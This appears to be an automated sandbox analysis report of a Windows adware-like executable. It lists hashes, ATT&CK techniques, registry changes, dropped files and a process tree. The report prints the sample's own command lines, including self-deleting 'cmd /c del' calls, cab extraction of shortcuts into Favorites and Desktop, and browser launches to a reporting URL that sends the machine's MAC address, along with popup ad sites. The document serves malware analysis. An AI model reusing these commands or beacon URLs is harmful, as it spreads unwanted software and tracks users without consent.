13e50b8babbd893fa62f412669bc959a9dcf4d99de94b54467037416ce695286

Analysis

max time kernel
137s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25/08/2024, 14:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe
Size

48KB
MD5

c0ed1c56e47fda96debc6530b0b5c38b
SHA1

d0fd8625f3c6232b1b1fdc833adf8ced63ce3295
SHA256

13e50b8babbd893fa62f412669bc959a9dcf4d99de94b54467037416ce695286
SHA512

15ab059af198d51cbe973311460d6d43a8960dfc6d25c3c476e4e4f8feaa3fdfd2eab72c3f2a9758a9ac13fa836496fe6c6e8b73c831c0673b0b8ea16e1255e3
SSDEEP

768:nakxkSLCfmd2UbpCxPCbDnMuc4gsK2rHIMSLIneqvdvLAwA:qfmd2UbpcCvpXHNyChBA

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	ins406F.tmp

Executes dropped EXE 1 IoCs

pid	Process
3956	ins406F.tmp

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Lenovo\inchar32.dat	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\fxsst.dll	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	expand.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ins406F.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	expand.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	expand.exe

Modifies Internet Explorer settings 1 TTPs 41 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "431360603"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009a7bf3bae5f3a549b81f23758225dc5c00000000020000000000106600000001000020000000b16a912a17845cc7d72e03e560d63349849024c6a48b6a5eb3b9429de4b6bf6e000000000e80000000020000200000002728cbc54e9eb40e2c39d2eda94e4d407fd5f14b51747a7fdd3fefad9a3a67ed2000000006f384340243b1a24476a115b8acf6345caa520a1aec6809dabc44d52fb64ce340000000a1e0dde78b2a8cc4a08695320d51d01d4e37fae5f0335dca782295b8202f6a09f9d589a1608aacfdc0f8d0ef78a304e218c8b1657366c3883879aa61d36d9f13	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0637402faf6da01	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "35870959"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31127290"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31127290"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f00b6602faf6da01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{2D0BC228-62ED-11EF-A2A4-DEB7298358C0} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "35246024"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009a7bf3bae5f3a549b81f23758225dc5c00000000020000000000106600000001000020000000100e59b80564dc7e4ee37bcedea9a8a803ebae29112d5bf9e17cac47d066dc19000000000e80000000020000200000000ab1cb9bd93792d49ba7287e89e72c3b3ef7af64ed5b761457a6db2a631fe7392000000071e51d937339f463fbb47a97fada8cfa2e1ac7380964a16bb6da22fca2d5509840000000d24e34fae1a494c6705445799eb850275bec9d1b8de9adffbe898b0fc301860f49f87579d697762065d9da78ae266de61788c26def360b2717e480cb13fcb174	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "35246024"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31127290"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "35870959"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31127290"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeIncBasePriorityPrivilege	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	3956	ins406F.tmp

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2984	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2984	iexplore.exe
2984	iexplore.exe
3124	IEXPLORE.EXE
3124	IEXPLORE.EXE
3124	IEXPLORE.EXE
3124	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 3368 wrote to memory of 852	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	95
PID 3368 wrote to memory of 852	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	95
PID 3368 wrote to memory of 852	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	95
PID 3368 wrote to memory of 432	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	97
PID 3368 wrote to memory of 432	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	97
PID 3368 wrote to memory of 432	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	97
PID 3368 wrote to memory of 60	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	98
PID 3368 wrote to memory of 60	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	98
PID 3368 wrote to memory of 60	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	98
PID 3368 wrote to memory of 2984	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	101
PID 3368 wrote to memory of 2984	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	101
PID 3368 wrote to memory of 4204	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	102
PID 3368 wrote to memory of 4204	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	102
PID 3368 wrote to memory of 4608	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	103
PID 3368 wrote to memory of 4608	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	103
PID 3368 wrote to memory of 1428	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	105
PID 3368 wrote to memory of 1428	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	105
PID 3368 wrote to memory of 1428	3368	c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe	105
PID 2984 wrote to memory of 3124	2984	iexplore.exe	106
PID 2984 wrote to memory of 3124	2984	iexplore.exe	106
PID 2984 wrote to memory of 3124	2984	iexplore.exe	106
PID 852 wrote to memory of 3956	852	cmd.exe	104
PID 852 wrote to memory of 3956	852	cmd.exe	104
PID 852 wrote to memory of 3956	852	cmd.exe	104
PID 432 wrote to memory of 3024	432	cmd.exe	107
PID 432 wrote to memory of 3024	432	cmd.exe	107
PID 432 wrote to memory of 3024	432	cmd.exe	107
PID 60 wrote to memory of 2792	60	cmd.exe	108
PID 60 wrote to memory of 2792	60	cmd.exe	108
PID 60 wrote to memory of 2792	60	cmd.exe	108
PID 3956 wrote to memory of 4468	3956	ins406F.tmp	115
PID 3956 wrote to memory of 4468	3956	ins406F.tmp	115
PID 3956 wrote to memory of 4468	3956	ins406F.tmp	115

C:\Users\Admin\AppData\Local\Temp\c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\c0ed1c56e47fda96debc6530b0b5c38b_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\run_dws_file.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:852
- - C:\Users\Admin\AppData\Local\Temp\ins406F.tmp
    C:\Users\Admin\AppData\Local\Temp\ins406F.tmp accm3p_gench.tmp
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3956
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\ins406F.tmp > nul
      4⤵
      System Location Discovery: System Language Discovery
      PID:4468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp_ext_favurl_cab.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:432
- - C:\Windows\SysWOW64\expand.exe
    expand.exe "C:\Users\Admin\AppData\Local\Temp\favorites_url.cab" -F:*.* "C:\Users\Admin\Favorites"
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:3024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp_ext_deskurl_cab.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:60
- - C:\Windows\SysWOW64\expand.exe
    expand.exe "C:\Users\Admin\AppData\Local\Temp\desktop_url.cab" -F:*.* "C:\Users\Admin\Desktop"
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2792
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://jump3.35638.com:27889/report3.ashx?m=DE-B7-29-83-58-C0&mid=21663&tid=1&d=050d7b9457d73908b04e261b2c95cd21&uid=13729&t=
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2984
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2984 CREDAT:17410 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:3124
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://tc.58816.com/
  2⤵
  - Modifies Internet Explorer settings
  PID:4204
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://www.38522.com/bhy.html?popup
  2⤵
  - Modifies Internet Explorer settings
  PID:4608
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\C0ED1C~1.EXE > nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4276,i,13995403245988825027,7033610968827661507,262144 --variations-seed-version --mojo-platform-channel-handle=1316 /prefetch:8
1⤵
PID:2408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verBFE0.tmp

Filesize
15KB

MD5
1a545d0052b581fbb2ab4c52133846bc

SHA1
62f3266a9b9925cd6d98658b92adec673cbe3dd3

SHA256
557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

SHA512
bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0KP8BKDN\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\accm3p_gench.tmp

Filesize
716B

MD5
7174b70886ee1dda1d0cab12d0e3f327

SHA1
10fb3dd7ed093e1546a5e8e8639b6c5822345b98

SHA256
64001f6bdebc532aec46f0f71fc5bb38cd69f18b9c504581cb261c2d5cc7e06e

SHA512
24c43642e2f9abe4a8d458ddfb47a7540fa821afa9ba62de8d0654a7f73d6d46cd4b25b97b1b2c9a07dce3a5b1fbd456a118e6bd08128729be38d6f432ab28cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\run_dws_file.bat

Filesize
62B

MD5
0e495bf4b1d42d1d1ee7f788810d32f0

SHA1
98c412c046636949fa5611f13947531d37e8f3ae

SHA256
5586f66dadf1ca0e8afcae1cf72f556d19a3be17e201aaa31b5bf0f960805ad3

SHA512
956263057477ddc086e15fd78643c3bf029dfee58150ecb53a5c56b12be6d9904598a928a8bfed6a2715ff72d5bc59d1debc778349baa1422638afd48a78b874

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp_ext_deskurl_cab.bat

Filesize
94B

MD5
d5fc3a9ec15a6302543438928c29e284

SHA1
fd4199e543f683a8830a88f8ac0d0f001952b506

SHA256
b2160315eb2f3bcb2e7601e0ce7fbb4ed72094b891d3db3b5119b07eeccc568d

SHA512
4d0378480f1e7d5bee5cf8f8cd3495745c05408785ab687b92be739cd64c077f0e3ee26d6d96e27eb6e2c3dec5f39a2766c45854dc2d6a5b6defc672aeafa0f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp_ext_favurl_cab.bat

Filesize
98B

MD5
8663de6fce9208b795dc913d1a6a3f5b

SHA1
882193f208cf012eaf22eeaa4fef3b67e7c67c15

SHA256
2909ea8555f2fc19097c1070a1da8fcfd6dc6886aa1d99d7e0c05e53feeb5b61

SHA512
9381063e0f85e874be54ae22675393b82c6ab54b223090148e4acbeff6f22393c96c90b83d6538461b695528af01d1f1231cf5dc719f07d6168386974b490688

Download Submit
C:\Users\Admin\Favorites\°ËØÔÉ«Í¼.url

Filesize
154B

MD5
8d681a59ea75e91f730bd9ce3c42e514

SHA1
9d426029daeebf03c9053761e0e5a9f447f98e9c

SHA256
afd3d42faa66d6703a32f2f5b41e0d679dd8210aacb284d1e46854207087cac7

SHA512
ffece212187fb127e98a612a59e7f2df7e9ebc6fee600644e2eef80d62fcc7d411ffba435b48981c4d75ba0ca34f85ff57091f4098104651710220a28a13ba8d

Download Submit
C:\Users\Admin\Favorites\°Ù¹ÈµçÓ°.url

Filesize
155B

MD5
5a17106c27138df10448c2c3be95f399

SHA1
56acc2ed4fea4171127a13dcdee08bdd39d674d6

SHA256
c544ab13bd785ea3d5792873dedb102e87ea9a3b28fb1283be2eaac363ce360c

SHA512
1d8839f36323dfb4458745dbf31a98bc676121db3e4ccda59ca8e177437c85a5811125119fbfa3b5bcde6c2fbf25ae910109e785e276c32fbfebe6437aea8198

Download Submit
C:\Users\Admin\Favorites\´´ÒµÍ¶×ÊºÃÏîÄ¿.url

Filesize
156B

MD5
8a275b261afcc166671132b6f03831e4

SHA1
03ac21edc1de2df748ee3a301a6b3de989c423c3

SHA256
0296e167f4cfe36275cf1a705a6c56b30b15c0712ec5904b4ed3299f07beee8e

SHA512
269cf3d57201d9c390cef3a8e74d63036d300ff464d20b419324d4575c04e004655179ac29da5e3b2b52a5e2b6f37ecbf6e512fa0c2c5d5af0c5a359af51d739

Download Submit
C:\Users\Admin\Favorites\¿´¿´µçÓ°.url

Filesize
158B

MD5
d645085ab92574a2a17abd323415dde5

SHA1
49ebaa4499cacd9256f270f35f31684b7cd195b1

SHA256
41ef37f97f886f32ec9e4d9ebf58079442d8bc8b102e9487de2f3f7da36e8058

SHA512
a726352ef7725eb8f94609dc3b80b5314387416513e654487e6a0b96bab922412b15bfbc07f1643bc104543be7c4c8a1b1472374d8cfe7fa9a010d28a135d654

Download Submit
C:\Users\Admin\Favorites\ÃÀÅ®ÀÖÔ°.url

Filesize
157B

MD5
993f72a439a3301caeb969c7faa7a8b9

SHA1
176244349a0463cd0fc38cad426d89dc3b055311

SHA256
b7ea84a9d48f22c799c3c3b96f29f0ae7c1b274e6402d6fbadae31fc053f2140

SHA512
c373b12c16c65e966593990019b3a2fd96f703820976835c7ab3d042a997f617f49c1b5110e77833a18b3d2a2bef8fd3a97e77ea05dd7cdce9053840398320d8

Download Submit
\??\c:\users\admin\appdata\local\temp\desktop_url.cab

Filesize
475B

MD5
7435d786e086d63639c02a3f39cecf84

SHA1
a4d70109c0099e46e2cb17c92c1eb901b0744d46

SHA256
376c35bd15ab9fb651cec5008e8ad5b5b894a5219a1f887199971a0c5a5c2598

SHA512
3db60a0722b302bf48725e9cf78b2683e32ffd65a6f7bebb218eb0e0d2db1922b64678636013d9bf83368e5f5f64794678a9f657897bba541f2749b71da09edc

Download Submit
\??\c:\users\admin\appdata\local\temp\favorites_url.cab

Filesize
425B

MD5
da68bc3b7c3525670a04366bc55629f5

SHA1
15fda47ecfead7db8f7aee6ca7570138ba7f1b71

SHA256
73f3605192b676c92649034768378909a19d13883a7ea6f8ba1b096c78ffadb5

SHA512
6fee416affcb6a74621479697bca6f14f5429b00de3aa595abe3c60c6b2e094877b59f8783bbe7bdd567fa565d0630bb02def5603f8f0ea92fe8f2c3ac5383c0

Download Submit
memory/3368-32-0x0000000000400000-0x0000000000411000-memory.dmp

Filesize
68KB

Download
memory/3956-78-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download
memory/3956-38-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download
memory/3956-39-0x00000000000C0000-0x00000000000C2000-memory.dmp

Filesize
8KB

Download